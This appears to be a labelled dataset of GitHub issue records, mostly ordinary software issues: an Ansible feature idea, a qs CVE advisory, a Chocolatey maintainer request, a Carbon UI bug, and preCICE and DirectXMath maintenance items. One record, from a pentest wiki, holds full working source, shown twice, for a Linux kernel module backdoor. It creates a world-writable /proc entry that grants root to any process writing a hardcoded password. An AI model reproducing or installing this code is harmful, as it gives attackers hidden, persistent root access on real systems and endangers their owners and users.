vmware_guest.py implement datastore cluster support - ##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME vmware_guest.py ##### ANSIBLE VERSION ``` ansible 2.2.0 ``` ##### CONFIGURATION Default configuration ##### OS / ENVIRONMENT N/A ##### SUMMARY This module should support datastore clusters in a vsphere environment. In order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use SDRS funcionality to allocate the requiered resources. ``` def deploy_template(self, poweron=False, wait_for_ip=False): # FIXME: # - clusters # - multiple datacenters # - resource pools # - multiple templates by the same name # - use disk config from template by default # - static IPs ``` ##### STEPS TO REPRODUCE N/A ##### EXPECTED RESULTS N/A ##### ACTUAL RESULTS ``` N/A ```
main
vmware guest py implement datastore cluster support issue type feature idea component name vmware guest py ansible version ansible configuration default configuration os environment n a summary this module should support datastore clusters in a vsphere environment in order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use sdrs funcionality to allocate the requiered resources def deploy template self poweron false wait for ip false fixme clusters multiple datacenters resource pools multiple templates by the same name use disk config from template by default static ips steps to reproduce n a expected results n a actual results n a
1
2,168
7,600,765,683
IssuesEvent
2018-04-28 06:12:25
nixawk/pentest-wiki
https://api.github.com/repos/nixawk/pentest-wiki
opened
[Maintaining Access] Linux Kernel Backdoor
Maintaining-Access
<img width="1228" alt="linux-kernel-backdoor" src="https://user-images.githubusercontent.com/7352479/39392752-15e92a76-4a81-11e8-975e-8b72ed3998eb.png"> ``` #include <linux/kernel.h> #include <linux/types.h> #include <linux/export.h> #include <linux/kthread.h> #include <linux/module.h> #include <linux/debugfs.h> #include <linux/proc_fs.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/slab.h> #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" // /proc/KERN_PROCROOT/KERN_PROCFILE #define KERN_PASSWORD "password" static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *); static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *); static int mymodule_open(struct inode *, struct file *); static int mymodule_procfs_attach(void); static int __init mymodule_init(void); static void __exit mymodule_exit(void); static struct proc_dir_entry *proc_root; static struct proc_dir_entry *proc_file; static const struct file_operations proc_fops = { .open= mymodule_open, .read= mymodule_read, .write = mymodule_write, }; MODULE_LICENSE("GPL"); MODULE_AUTHOR("sunxi-debug"); MODULE_DESCRIPTION("Adds a backdoor to the linux kernel"); static ssize_t mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data) { char *kbuf; struct cred *cred; static struct task_struct *task; if (count < 1) return -EINVAL; kbuf = kmalloc(count, GFP_KERNEL); if (!kbuf) return -ENOMEM; if (copy_from_user(kbuf, buffer, count)) { kfree(kbuf); return -EFAULT; } if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){ task = get_current(); cred = (struct cred *)__task_cred(task); cred->uid = GLOBAL_ROOT_UID; cred->gid = GLOBAL_ROOT_GID; cred->suid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->egid = GLOBAL_ROOT_GID; cred->fsuid = GLOBAL_ROOT_UID; cred->fsgid = GLOBAL_ROOT_GID; printk(KERN_WARNING "Module is installed successfully\n"); } kfree(kbuf); return count; } static 
ssize_t mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { return 0; } static int mymodule_open(struct inode *inode, struct file *file) { return 0; } static int mymodule_procfs_attach(void) { proc_root = proc_mkdir(KERN_PROCROOT, NULL); proc_file = proc_create(KERN_PROCFILE, 0666, proc_root, &proc_fops); printk(KERN_INFO "proc_create successfully\n"); if (IS_ERR(proc_file)){ printk(KERN_ERR "proc_create failed\n"); return -1; } return 0; } static int __init mymodule_init(void) { int ret; printk(KERN_INFO "module __init\n"); ret = mymodule_procfs_attach(); if(ret){ printk(KERN_INFO "module __init failed\n "); } return ret; } static void __exit mymodule_exit(void) { printk(KERN_INFO "module __exit\n"); remove_proc_entry(KERN_PROCFILE, proc_root); remove_proc_entry(KERN_PROCROOT, NULL); } module_init(mymodule_init); module_exit(mymodule_exit); // References // https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523 // https://github.com/rapid7/metasploit-framework/issues/6869 // https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41 // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225 // https://wiki.archlinux.org/index.php/Kernel_module // https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/ ```
True
[Maintaining Access] Linux Kernel Backdoor - <img width="1228" alt="linux-kernel-backdoor" src="https://user-images.githubusercontent.com/7352479/39392752-15e92a76-4a81-11e8-975e-8b72ed3998eb.png"> ``` #include <linux/kernel.h> #include <linux/types.h> #include <linux/export.h> #include <linux/kthread.h> #include <linux/module.h> #include <linux/debugfs.h> #include <linux/proc_fs.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/slab.h> #define KERN_PROCROOT "mod" #define KERN_PROCFILE "bdm" // /proc/KERN_PROCROOT/KERN_PROCFILE #define KERN_PASSWORD "password" static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *); static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *); static int mymodule_open(struct inode *, struct file *); static int mymodule_procfs_attach(void); static int __init mymodule_init(void); static void __exit mymodule_exit(void); static struct proc_dir_entry *proc_root; static struct proc_dir_entry *proc_file; static const struct file_operations proc_fops = { .open= mymodule_open, .read= mymodule_read, .write = mymodule_write, }; MODULE_LICENSE("GPL"); MODULE_AUTHOR("sunxi-debug"); MODULE_DESCRIPTION("Adds a backdoor to the linux kernel"); static ssize_t mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data) { char *kbuf; struct cred *cred; static struct task_struct *task; if (count < 1) return -EINVAL; kbuf = kmalloc(count, GFP_KERNEL); if (!kbuf) return -ENOMEM; if (copy_from_user(kbuf, buffer, count)) { kfree(kbuf); return -EFAULT; } if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){ task = get_current(); cred = (struct cred *)__task_cred(task); cred->uid = GLOBAL_ROOT_UID; cred->gid = GLOBAL_ROOT_GID; cred->suid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->euid = GLOBAL_ROOT_UID; cred->egid = GLOBAL_ROOT_GID; cred->fsuid = GLOBAL_ROOT_UID; cred->fsgid = GLOBAL_ROOT_GID; printk(KERN_WARNING "Module is installed 
successfully\n"); } kfree(kbuf); return count; } static ssize_t mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos) { return 0; } static int mymodule_open(struct inode *inode, struct file *file) { return 0; } static int mymodule_procfs_attach(void) { proc_root = proc_mkdir(KERN_PROCROOT, NULL); proc_file = proc_create(KERN_PROCFILE, 0666, proc_root, &proc_fops); printk(KERN_INFO "proc_create successfully\n"); if (IS_ERR(proc_file)){ printk(KERN_ERR "proc_create failed\n"); return -1; } return 0; } static int __init mymodule_init(void) { int ret; printk(KERN_INFO "module __init\n"); ret = mymodule_procfs_attach(); if(ret){ printk(KERN_INFO "module __init failed\n "); } return ret; } static void __exit mymodule_exit(void) { printk(KERN_INFO "module __exit\n"); remove_proc_entry(KERN_PROCFILE, proc_root); remove_proc_entry(KERN_PROCROOT, NULL); } module_init(mymodule_init); module_exit(mymodule_exit); // References // https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523 // https://github.com/rapid7/metasploit-framework/issues/6869 // https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41 // https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225 // https://wiki.archlinux.org/index.php/Kernel_module // https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/ ```
main
linux kernel backdoor img width alt linux kernel backdoor src include include include include include include include include include include define kern procroot mod define kern procfile bdm proc kern procroot kern procfile define kern password password static ssize t mymodule write struct file const char user size t loff t static ssize t mymodule read struct file char user size t loff t static int mymodule open struct inode struct file static int mymodule procfs attach void static int init mymodule init void static void exit mymodule exit void static struct proc dir entry proc root static struct proc dir entry proc file static const struct file operations proc fops open mymodule open read mymodule read write mymodule write module license gpl module author sunxi debug module description adds a backdoor to the linux kernel static ssize t mymodule write struct file file const char user buffer size t count loff t data char kbuf struct cred cred static struct task struct task if count return einval kbuf kmalloc count gfp kernel if kbuf return enomem if copy from user kbuf buffer count kfree kbuf return efault if strncmp kern password char kbuf strlen kern password task get current cred struct cred task cred task cred uid global root uid cred gid global root gid cred suid global root uid cred euid global root uid cred euid global root uid cred egid global root gid cred fsuid global root uid cred fsgid global root gid printk kern warning module is installed successfully n kfree kbuf return count static ssize t mymodule read struct file file char user buf size t size loff t ppos return static int mymodule open struct inode inode struct file file return static int mymodule procfs attach void proc root proc mkdir kern procroot null proc file proc create kern procfile proc root proc fops printk kern info proc create successfully n if is err proc file printk kern err proc create failed n return return static int init mymodule init void int ret printk kern info module init n 
ret mymodule procfs attach if ret printk kern info module init failed n return ret static void exit mymodule exit void printk kern info module exit n remove proc entry kern procfile proc root remove proc entry kern procroot null module init mymodule init module exit mymodule exit references
1
174,066
21,214,295,692
IssuesEvent
2022-04-11 05:09:50
LaudateCorpus1/HomeWorkApril
https://api.github.com/repos/LaudateCorpus1/HomeWorkApril
closed
CVE-2021-44907 (High) detected in qs-6.7.0.tgz, qs-6.5.1.tgz - autoclosed
security vulnerability
## CVE-2021-44907 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>qs-6.7.0.tgz</b>, <b>qs-6.5.1.tgz</b></p></summary> <p> <details><summary><b>qs-6.7.0.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.7.0.tgz">https://registry.npmjs.org/qs/-/qs-6.7.0.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/body-parser/node_modules/qs/package.json,/Application/node_modules/express/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - sails-1.5.2.tgz (Root Library) - express-4.17.1.tgz - :x: **qs-6.7.0.tgz** (Vulnerable Library) </details> <details><summary><b>qs-6.5.1.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.5.1.tgz">https://registry.npmjs.org/qs/-/qs-6.5.1.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - grunt-contrib-watch-1.1.0.tgz (Root Library) - tiny-lr-1.1.1.tgz - :x: **qs-6.5.1.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/LaudateCorpus1/HomeWorkApril/commit/89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3">89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. 
The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. <p>Publish Date: 2022-03-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-44907>CVE-2021-44907</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907</a></p> <p>Release Date: 2022-03-17</p> <p>Fix Resolution: qs - 6.8.1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-44907 (High) detected in qs-6.7.0.tgz, qs-6.5.1.tgz - autoclosed - ## CVE-2021-44907 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>qs-6.7.0.tgz</b>, <b>qs-6.5.1.tgz</b></p></summary> <p> <details><summary><b>qs-6.7.0.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.7.0.tgz">https://registry.npmjs.org/qs/-/qs-6.7.0.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/body-parser/node_modules/qs/package.json,/Application/node_modules/express/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - sails-1.5.2.tgz (Root Library) - express-4.17.1.tgz - :x: **qs-6.7.0.tgz** (Vulnerable Library) </details> <details><summary><b>qs-6.5.1.tgz</b></p></summary> <p>A querystring parser that supports nesting and arrays, with a depth limit</p> <p>Library home page: <a href="https://registry.npmjs.org/qs/-/qs-6.5.1.tgz">https://registry.npmjs.org/qs/-/qs-6.5.1.tgz</a></p> <p>Path to dependency file: /Application/package.json</p> <p>Path to vulnerable library: /Application/node_modules/qs/package.json</p> <p> Dependency Hierarchy: - grunt-contrib-watch-1.1.0.tgz (Root Library) - tiny-lr-1.1.1.tgz - :x: **qs-6.5.1.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/LaudateCorpus1/HomeWorkApril/commit/89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3">89c4ff51dbbd3fc1f630cdd6dfe647f6ad6ec7d3</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of 
property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior. <p>Publish Date: 2022-03-17 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-44907>CVE-2021-44907</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44907</a></p> <p>Release Date: 2022-03-17</p> <p>Fix Resolution: qs - 6.8.1</p> </p> </details> <p></p> *** Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_main
cve high detected in qs tgz qs tgz autoclosed cve high severity vulnerability vulnerable libraries qs tgz qs tgz qs tgz a querystring parser that supports nesting and arrays with a depth limit library home page a href path to dependency file application package json path to vulnerable library application node modules body parser node modules qs package json application node modules express node modules qs package json dependency hierarchy sails tgz root library express tgz x qs tgz vulnerable library qs tgz a querystring parser that supports nesting and arrays with a depth limit library home page a href path to dependency file application package json path to vulnerable library application node modules qs package json dependency hierarchy grunt contrib watch tgz root library tiny lr tgz x qs tgz vulnerable library found in head commit a href found in base branch master vulnerability details a denial of service vulnerability exists in qs up to due to insufficient sanitization of property in the gs parse function the merge function allows the assignment of properties on an array in the query for any property being assigned a value in the array is converted to an object containing these properties essentially this means that the property whose expected type is array always has to be checked with array isarray by the user this may not be obvious to the user and can cause unexpected behavior publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution qs step up your open source security game with whitesource
0
1,434
6,223,445,558
IssuesEvent
2017-07-10 11:57:19
chocolatey/chocolatey-package-requests
https://api.github.com/repos/chocolatey/chocolatey-package-requests
opened
RFM - rukerneltool
Status: Available For Maintainer(s)
The maintainers from the [rukerneltool](https://chocolatey.org/packages/rukerneltool) recently decided to stop maintaining this package and is requesting a new maintainer for it. The source of the package is available [here](https://github.com/chocolatey/chocolatey-coreteampackages/tree/48432b87549778f930b9f0012c61d112237525c6/automatic/rukerneltool).
True
RFM - rukerneltool - The maintainers from the [rukerneltool](https://chocolatey.org/packages/rukerneltool) recently decided to stop maintaining this package and is requesting a new maintainer for it. The source of the package is available [here](https://github.com/chocolatey/chocolatey-coreteampackages/tree/48432b87549778f930b9f0012c61d112237525c6/automatic/rukerneltool).
main
rfm rukerneltool the maintainers from the recently decided to stop maintaining this package and is requesting a new maintainer for it the source of the package is available
1
4,476
23,344,873,065
IssuesEvent
2022-08-09 16:57:51
carbon-design-system/carbon
https://api.github.com/repos/carbon-design-system/carbon
closed
[Bug]: React Tabs storybook could be improved
type: docs 📖 severity: 4 impact: low good first issue 👋 status: waiting for maintainer response 💬 package: @carbon/react
### Package @carbon/react ### Browser Chrome ### Package version https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### React version _No response_ ### Description If you go to https://react.carbondesignsystem.com/?path=/story/components-tabs--manual the Example button is _always_ showing up. However, it is supposed to appear _only_ when the second tab is selected. <img width="909" alt="Screenshot 2022-04-26 at 7 41 46 AM" src="https://user-images.githubusercontent.com/14298245/165327368-6b5dad96-398d-456b-8c59-8c2a9c263535.png"> Here's what it should look like.... The non-manual with tab 1 selected: <img width="956" alt="image" src="https://user-images.githubusercontent.com/14298245/165326933-b4c63920-232d-4a2d-8c9d-b487863d428d.png"> And then non-manual when the second tab is selected <img width="919" alt="image" src="https://user-images.githubusercontent.com/14298245/165327549-d186d658-1294-4f9a-bf0d-1311cf0436c3.png"> --- BTW, in addition to it appearing when it shouldn't on the manual example, in all examples, I'd like to suggest that this Example button should be located underneath the "Tab Panel 2" text. it's pretty awkward/non-sensical where it is. If you agree its position is odd, it needs to be repositioned across all Tabs examples. ### CodeSandbox example https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### Steps to reproduce It's probably better to list the steps for what it's supposed to be. Expected behaviour: 1. navigate to the tab example 2. confirm that Example button does not appear on tab panel 1 3. Navigate to tab 2 (and activate if necessary) 4. Confirm the Example button appears on tab panel 2 5. Navigate to tab 3, activating if necessary 6. Confirm the Example button does not appear on tab panel 3. Carry this out with https://react.carbondesignsystem.com/?path=/story/components-tabs--contained and it will pass. 
Carry it out with https://react.carbondesignsystem.com/?path=/story/components-tabs--manual and it will fail. ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md) - [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems
True
[Bug]: React Tabs storybook could be improved - ### Package @carbon/react ### Browser Chrome ### Package version https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### React version _No response_ ### Description If you go to https://react.carbondesignsystem.com/?path=/story/components-tabs--manual the Example button is _always_ showing up. However, it is supposed to appear _only_ when the second tab is selected. <img width="909" alt="Screenshot 2022-04-26 at 7 41 46 AM" src="https://user-images.githubusercontent.com/14298245/165327368-6b5dad96-398d-456b-8c59-8c2a9c263535.png"> Here's what it should look like.... The non-manual with tab 1 selected: <img width="956" alt="image" src="https://user-images.githubusercontent.com/14298245/165326933-b4c63920-232d-4a2d-8c9d-b487863d428d.png"> And then non-manual when the second tab is selected <img width="919" alt="image" src="https://user-images.githubusercontent.com/14298245/165327549-d186d658-1294-4f9a-bf0d-1311cf0436c3.png"> --- BTW, in addition to it appearing when it shouldn't on the manual example, in all examples, I'd like to suggest that this Example button should be located underneath the "Tab Panel 2" text. it's pretty awkward/non-sensical where it is. If you agree its position is odd, it needs to be repositioned across all Tabs examples. ### CodeSandbox example https://react.carbondesignsystem.com/?path=/story/components-tabs--manual ### Steps to reproduce It's probably better to list the steps for what it's supposed to be. Expected behaviour: 1. navigate to the tab example 2. confirm that Example button does not appear on tab panel 1 3. Navigate to tab 2 (and activate if necessary) 4. Confirm the Example button appears on tab panel 2 5. Navigate to tab 3, activating if necessary 6. Confirm the Example button does not appear on tab panel 3. Carry this out with https://react.carbondesignsystem.com/?path=/story/components-tabs--contained and it will pass. 
Carry it out with https://react.carbondesignsystem.com/?path=/story/components-tabs--manual and it will fail. ### Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md) - [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems
main
react tabs storybook could be improved package carbon react browser chrome package version react version no response description if you go to the example button is always showing up however it is supposed to appear only when the second tab is selected img width alt screenshot at am src here s what it should look like the non manual with tab selected img width alt image src and then non manual when the second tab is selected img width alt image src btw in addition to it appearing when it shouldn t on the manual example in all examples i d like to suggest that this example button should be located underneath the tab panel text it s pretty awkward non sensical where it is if you agree its position is odd it needs to be repositioned across all tabs examples codesandbox example steps to reproduce it s probably better to list the steps for what it s supposed to be expected behaviour navigate to the tab example confirm that example button does not appear on tab panel navigate to tab and activate if necessary confirm the example button appears on tab panel navigate to tab activating if necessary confirm the example button does not appear on tab panel carry this out with and it will pass carry it out with and it will fail code of conduct i agree to follow this project s i checked the for duplicate problems
1
94,833
11,914,464,587
IssuesEvent
2020-03-31 13:38:40
fecgov/fec-cms
https://api.github.com/repos/fecgov/fec-cms
closed
Add reaction box below Presidential candidate map
HOTFIX Work: UX/Design
**What we're after:** Now that the map is live and seems to be working just wonderfully, we should add a reaction box to track feedback from users. **Completion criteria:** - [ ] Add reaction box, centered, below the feature under a feature flag Example of how the reaction box looks. This one is below WCCF. <img width="884" alt="Screen Shot 2020-03-26 at 12 23 12 PM" src="https://user-images.githubusercontent.com/31663028/77670533-b73b1b80-6f5c-11ea-80eb-04fcb86c8e9f.png">
1.0
Add reaction box below Presidential candidate map - **What we're after:** Now that the map is live and seems to be working just wonderfully, we should add a reaction box to track feedback from users. **Completion criteria:** - [ ] Add reaction box, centered, below the feature under a feature flag Example of how the reaction box looks. This one is below WCCF. <img width="884" alt="Screen Shot 2020-03-26 at 12 23 12 PM" src="https://user-images.githubusercontent.com/31663028/77670533-b73b1b80-6f5c-11ea-80eb-04fcb86c8e9f.png">
non_main
add reaction box below presidential candidate map what we re after now that the map is live and seems to be working just wonderfully we should add a reaction box to track feedback from users completion criteria add reaction box centered below the feature under a feature flag example of how the reaction box looks this one is below wccf img width alt screen shot at pm src
0
2,977
10,720,173,118
IssuesEvent
2019-10-26 15:48:07
precice/precice
https://api.github.com/repos/precice/precice
opened
Simplify Communication Interface
maintainability
The current list of functions required to implement a communication backend is [absouletly huge](https://xgm.de/precice/docs/develop/classprecice_1_1com_1_1Communication.html). Currently this is the following cross product **for each POD** (char, int, double): ` {send, reveive} x (synchronous, asynchronous, broadcast} x {POD, vector<POD>, pointer to POD & size}` Instead, we could do as `boost.asio` does and implement a `const_buffer` for sending and a `mutable_buffer` for receiving data. Those buffers are essentially just a pointer and a size. The three versions for `POD, vector<POD>, pointer to POD & size` can the be implemented in terms of sending or receiving a `_buffer<POD>` as non-virtual functions in `com::Communication`. Thus, we would reduce the cross product for each POD (char, int, double) to ` {send, reveive} x (synchronous, asynchronous, broadcast}`. We could also remove all functions except `_buffer`-calls from the communication module and require some sort of `com::buffer()` to be called at the call-side. Similar to [`boost::asio::buffer()`](https://www.boost.org/doc/libs/1_71_0/doc/html/boost_asio/reference/buffer.html). This would make debugging and adding new back-ends easier. It also reduces possible traps as there is only one function to implement per type and purpose.
True
Simplify Communication Interface - The current list of functions required to implement a communication backend is [absolutely huge](https://xgm.de/precice/docs/develop/classprecice_1_1com_1_1Communication.html). Currently this is the following cross product **for each POD** (char, int, double): ` {send, receive} x {synchronous, asynchronous, broadcast} x {POD, vector<POD>, pointer to POD & size}` Instead, we could do as `boost.asio` does and implement a `const_buffer` for sending and a `mutable_buffer` for receiving data. Those buffers are essentially just a pointer and a size. The three versions for `POD, vector<POD>, pointer to POD & size` can then be implemented in terms of sending or receiving a `_buffer<POD>` as non-virtual functions in `com::Communication`. Thus, we would reduce the cross product for each POD (char, int, double) to ` {send, receive} x {synchronous, asynchronous, broadcast}`. We could also remove all functions except `_buffer` calls from the communication module and require some sort of `com::buffer()` to be called at the call site. Similar to [`boost::asio::buffer()`](https://www.boost.org/doc/libs/1_71_0/doc/html/boost_asio/reference/buffer.html). This would make debugging and adding new back-ends easier. It also reduces possible traps as there is only one function to implement per type and purpose.
main
simplify communication interface the current list of functions required to implement a communication backend is currently this is the following cross product for each pod char int double send reveive x synchronous asynchronous broadcast x pod vector pointer to pod size instead we could do as boost asio does and implement a const buffer for sending and a mutable buffer for receiving data those buffers are essentially just a pointer and a size the three versions for pod vector pointer to pod size can the be implemented in terms of sending or receiving a buffer as non virtual functions in com communication thus we would reduce the cross product for each pod char int double to send reveive x synchronous asynchronous broadcast we could also remove all functions except buffer calls from the communication module and require some sort of com buffer to be called at the call side similar to this would make debugging and adding new back ends easier it also reduces possible traps as there is only one function to implement per type and purpose
1
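The precice record above proposes collapsing the per-POD send/receive overloads into boost::asio-style buffer types. A minimal sketch of that idea follows; all names here (`com::const_buffer`, `com::mutable_buffer`, `com::make_buffer`, the stub `send`/`receive`) are hypothetical illustrations, not precice's actual API.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

namespace com {

// A buffer is essentially just a pointer and an element count,
// mirroring boost::asio::const_buffer / mutable_buffer.
template <typename T>
struct const_buffer {
    const T* data;
    std::size_t size;
};

template <typename T>
struct mutable_buffer {
    T* data;
    std::size_t size;
};

// One make_buffer() overload set replaces the three per-POD variants
// (single value, std::vector, pointer + size) listed in the issue.
template <typename T>
const_buffer<T> make_buffer(const T& pod) { return {&pod, 1}; }

template <typename T>
const_buffer<T> make_buffer(const std::vector<T>& v) { return {v.data(), v.size()}; }

template <typename T>
const_buffer<T> make_buffer(const T* p, std::size_t n) { return {p, n}; }

template <typename T>
mutable_buffer<T> make_buffer(std::vector<T>& v) { return {v.data(), v.size()}; }

// The backend then needs only one send/receive pair per
// synchronous/asynchronous/broadcast mode. Stubs report the element count.
template <typename T>
std::size_t send(const_buffer<T> buf) { return buf.size; }

template <typename T>
std::size_t receive(mutable_buffer<T> buf) { return buf.size; }

}  // namespace com
```

Overload resolution does the work at the call site: a const value or vector deduces a `const_buffer`, a mutable vector deduces a `mutable_buffer`, so the `{POD, vector<POD>, pointer & size}` axis disappears from the virtual interface.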
3,077
11,646,097,361
IssuesEvent
2020-03-01 06:41:21
microsoft/DirectXMath
https://api.github.com/repos/microsoft/DirectXMath
closed
Remove VS 2015 compiler support
maintainence
This mostly allows me to remove the following workaround which was for VS 2015 RTM: ``` #if defined(_MSC_VER) && (_MSC_FULL_VER < 190023506) #define XM_CONST const #define XM_CONSTEXPR #else #define XM_CONST constexpr #define XM_CONSTEXPR constexpr #endif ```
True
Remove VS 2015 compiler support - This mostly allows me to remove the following workaround which was for VS 2015 RTM: ``` #if defined(_MSC_VER) && (_MSC_FULL_VER < 190023506) #define XM_CONST const #define XM_CONSTEXPR #else #define XM_CONST constexpr #define XM_CONSTEXPR constexpr #endif ```
main
remove vs compiler support this mostly allows me to remove the following workaround which was for vs rtm if defined msc ver msc full ver define xm const const define xm constexpr else define xm const constexpr define xm constexpr constexpr endif
1
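With the VS 2015 RTM fallback in the record above removed, both macros can expand to `constexpr` unconditionally. A sketch of the simplified definitions and what they enable (illustrative only; the `XM_PI` value and `XMConvertToRadians` body here are written from memory of DirectXMath's public API, not copied from the header):

```cpp
#include <cassert>

// The conditional block collapses to unconditional definitions:
#define XM_CONST constexpr
#define XM_CONSTEXPR constexpr

// Constants and helpers can then be evaluated at compile time.
XM_CONST float XM_PI = 3.141592654f;

XM_CONSTEXPR float XMConvertToRadians(float fDegrees) {
    return fDegrees * (XM_PI / 180.0f);
}

// constexpr lets the conversion participate in compile-time checks:
static_assert(XMConvertToRadians(180.0f) > 3.14f, "pi radians expected");
```

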